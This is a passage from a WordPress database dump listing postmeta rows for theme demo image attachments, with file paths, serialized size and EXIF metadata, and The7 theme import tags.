(3298,1570,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:72;s:6:\"height\";i:72;s:4:\"file\";s:18:\"2018/10/pl04-1.png\";s:8:\"filesize\";i:5519;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3299,1570,'_the7_imported_item','old-landing'),
(3300,1571,'_wp_attached_file','2018/10/pl05-1.png'),
(3301,1571,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:72;s:6:\"height\";i:72;s:4:\"file\";s:18:\"2018/10/pl05-1.png\";s:8:\"filesize\";i:5578;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3302,1571,'_the7_imported_item','old-landing'),
(3303,1580,'_wp_attached_file','2018/10/art-01-right_18_10_2018.png'),
(3304,1580,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1114;s:6:\"height\";i:921;s:4:\"file\";s:35:\"2018/10/art-01-right_18_10_2018.png\";s:8:\"filesize\";i:115539;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:35:\"art-01-right_18_10_2018-300x248.png\";s:5:\"width\";i:300;s:6:\"height\";i:248;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:67004;}s:5:\"large\";a:5:{s:4:\"file\";s:36:\"art-01-right_18_10_2018-1024x847.png\";s:5:\"width\";i:1024;s:6:\"height\";i:847;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:615278;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:35:\"art-01-right_18_10_2018-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:25576;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:35:\"art-01-right_18_10_2018-768x635.png\";s:5:\"width\";i:768;s:6:\"height\";i:635;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:367952;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3305,1580,'_the7_imported_item','old-landing'),
(3306,1581,'_wp_attached_file','2018/10/art-01-left_18_10_2018.png'),
(3307,1581,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:844;s:6:\"height\";i:958;s:4:\"file\";s:34:\"2018/10/art-01-left_18_10_2018.png\";s:8:\"filesize\";i:122155;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:34:\"art-01-left_18_10_2018-264x300.png\";s:5:\"width\";i:264;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:91646;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:34:\"art-01-left_18_10_2018-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:32340;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:34:\"art-01-left_18_10_2018-768x872.png\";s:5:\"width\";i:768;s:6:\"height\";i:872;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:683030;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3308,1581,'_the7_imported_item','old-landing'),
(3309,1582,'_wp_attached_file','2018/10/art-02-left_18_10_2018.png'),
(3310,1582,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:644;s:6:\"height\";i:673;s:4:\"file\";s:34:\"2018/10/art-02-left_18_10_2018.png\";s:8:\"filesize\";i:38181;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:34:\"art-02-left_18_10_2018-287x300.png\";s:5:\"width\";i:287;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:48610;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:34:\"art-02-left_18_10_2018-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:16081;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3311,1582,'_the7_imported_item','old-landing'),
(3312,1583,'_wp_attached_file','2018/10/art-02-right_18_10_2018.png'),
(3313,1583,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:801;s:6:\"height\";i:679;s:4:\"file\";s:35:\"2018/10/art-02-right_18_10_2018.png\";s:8:\"filesize\";i:56255;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:35:\"art-02-right_18_10_2018-300x254.png\";s:5:\"width\";i:300;s:6:\"height\";i:254;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:48600;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:35:\"art-02-right_18_10_2018-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:18842;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:35:\"art-02-right_18_10_2018-768x651.png\";s:5:\"width\";i:768;s:6:\"height\";i:651;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:237690;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3314,1583,'_the7_imported_item','old-landing'),
(3315,1584,'_wp_attached_file','2018/10/art-03-left_18_10_2018.png'),
(3316,1584,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1244;s:6:\"height\";i:685;s:4:\"file\";s:34:\"2018/10/art-03-left_18_10_2018.png\";s:8:\"filesize\";i:83990;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:34:\"art-03-left_18_10_2018-300x165.png\";s:5:\"width\";i:300;s:6:\"height\";i:165;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:26283;}s:5:\"large\";a:5:{s:4:\"file\";s:35:\"art-03-left_18_10_2018-1024x564.png\";s:5:\"width\";i:1024;s:6:\"height\";i:564;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:210726;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:34:\"art-03-left_18_10_2018-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:10667;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:34:\"art-03-left_18_10_2018-768x423.png\";s:5:\"width\";i:768;s:6:\"height\";i:423;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:132202;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3317,1584,'_the7_imported_item','old-landing'),
(3318,1585,'_wp_attached_file','2018/10/art-03-right_18_10_2018.png'),
(3319,1585,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:907;s:6:\"height\";i:421;s:4:\"file\";s:35:\"2018/10/art-03-right_18_10_2018.png\";s:8:\"filesize\";i:47328;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:35:\"art-03-right_18_10_2018-300x139.png\";s:5:\"width\";i:300;s:6:\"height\";i:139;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:25948;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:35:\"art-03-right_18_10_2018-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:10058;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:35:\"art-03-right_18_10_2018-768x356.png\";s:5:\"width\";i:768;s:6:\"height\";i:356;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:132310;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3320,1585,'_the7_imported_item','old-landing'),
(3321,1586,'_wp_attached_file','2018/10/art-mob-slider_18_10_2018.png'),
(3322,1586,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1024;s:6:\"height\";i:350;s:4:\"file\";s:37:\"2018/10/art-mob-slider_18_10_2018.png\";s:8:\"filesize\";i:88627;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:37:\"art-mob-slider_18_10_2018-300x103.png\";s:5:\"width\";i:300;s:6:\"height\";i:103;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:44781;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:37:\"art-mob-slider_18_10_2018-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:32796;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:37:\"art-mob-slider_18_10_2018-768x263.png\";s:5:\"width\";i:768;s:6:\"height\";i:263;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:241242;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3323,1586,'_the7_imported_item','old-landing'),
(3324,1591,'_wp_attached_file','2018/10/live008.jpg'),
(3325,1591,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:19:\"2018/10/live008.jpg\";s:8:\"filesize\";i:129940;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"live008-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15547;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"live008-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7749;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3326,1591,'_the7_imported_item','old-landing'),
(3327,1610,'_wp_attached_file','2018/12/demo-gut.jpg'),
(3328,1610,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:20:\"2018/12/demo-gut.jpg\";s:8:\"filesize\";i:116927;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"demo-gut-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18289;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"demo-gut-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8752;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3329,1610,'_the7_imported_item','old-landing'),
(3330,1644,'_wp_attached_file','2019/01/the7-landing-g-creative-demo.jpg'),
(3331,1644,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:40:\"2019/01/the7-landing-g-creative-demo.jpg\";s:8:\"filesize\";i:114394;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:40:\"the7-landing-g-creative-demo-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14158;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:40:\"the7-landing-g-creative-demo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7269;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3332,1644,'_the7_imported_item','old-landing'),
(3333,1661,'_wp_attached_file','2019/02/weed-demo-landing.jpg'),
(3334,1661,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:29:\"2019/02/weed-demo-landing.jpg\";s:8:\"filesize\";i:105997;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:29:\"weed-demo-landing-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16431;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:29:\"weed-demo-landing-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7496;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3335,1661,'_the7_imported_item','old-landing'),
(3336,1671,'_wp_attached_file','2019/03/minimal-creative.jpg'),
(3337,1671,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:28:\"2019/03/minimal-creative.jpg\";s:8:\"filesize\";i:128210;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:28:\"minimal-creative-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18323;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:28:\"minimal-creative-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7469;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3338,1671,'_the7_imported_item','old-landing'),
(3339,1715,'_wp_attached_file','2019/05/slider-bg.jpg'),
(3340,1715,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1850;s:6:\"height\";i:1000;s:4:\"file\";s:21:\"2019/05/slider-bg.jpg\";s:8:\"filesize\";i:225577;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"slider-bg-300x162.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:162;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9769;}s:5:\"large\";a:5:{s:4:\"file\";s:22:\"slider-bg-1024x554.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:554;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:67725;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"slider-bg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3220;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:21:\"slider-bg-768x415.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:415;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42221;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:22:\"slider-bg-1536x830.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:830;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:126874;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3341,1715,'_the7_imported_item','old-landing'),
(3342,1720,'_wp_attached_file','2019/05/slider-plugins.png'),
(3343,1720,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:492;s:6:\"height\";i:79;s:4:\"file\";s:26:\"2019/05/slider-plugins.png\";s:8:\"filesize\";i:7108;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"slider-plugins-300x48.png\";s:5:\"width\";i:300;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:18506;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"slider-plugins-150x79.png\";s:5:\"width\";i:150;s:6:\"height\";i:79;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4758;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3344,1720,'_the7_imported_item','old-landing'),
(3345,1734,'_wp_attached_file','2019/06/the7-mb-landing.jpg'),
(3346,1734,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:27:\"2019/06/the7-mb-landing.jpg\";s:8:\"filesize\";i:135932;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"the7-mb-landing-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16295;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"the7-mb-landing-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7563;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3347,1734,'_the7_imported_item','old-landing'),
(3348,1872,'_wp_attached_file','2019/06/dance-demo.jpg'),
(3349,1872,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:22:\"2019/06/dance-demo.jpg\";s:8:\"filesize\";i:88882;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"dance-demo-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12368;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"dance-demo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6545;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3350,1872,'_the7_imported_item','old-landing'),
(3351,1875,'_wp_attached_file','2019/06/d-m.jpg'),
(3352,1875,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:15:\"2019/06/d-m.jpg\";s:8:\"filesize\";i:138478;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:15:\"d-m-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15467;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:15:\"d-m-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7696;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3353,1875,'_the7_imported_item','old-landing'),
(3354,1879,'_wp_attached_file','2019/07/church.jpg'),
(3355,1879,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:18:\"2019/07/church.jpg\";s:8:\"filesize\";i:107749;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"church-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12063;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"church-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5391;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3356,1879,'_the7_imported_item','old-landing'),
(3357,1886,'_wp_attached_file','2019/08/7e-plugin.png'),
(3358,1886,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:72;s:6:\"height\";i:72;s:4:\"file\";s:21:\"2019/08/7e-plugin.png\";s:8:\"filesize\";i:4354;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3359,1886,'_the7_imported_item','old-landing'),
(3360,1887,'_wp_attached_file','2019/08/the7-landing-featurs-plugins.png'),
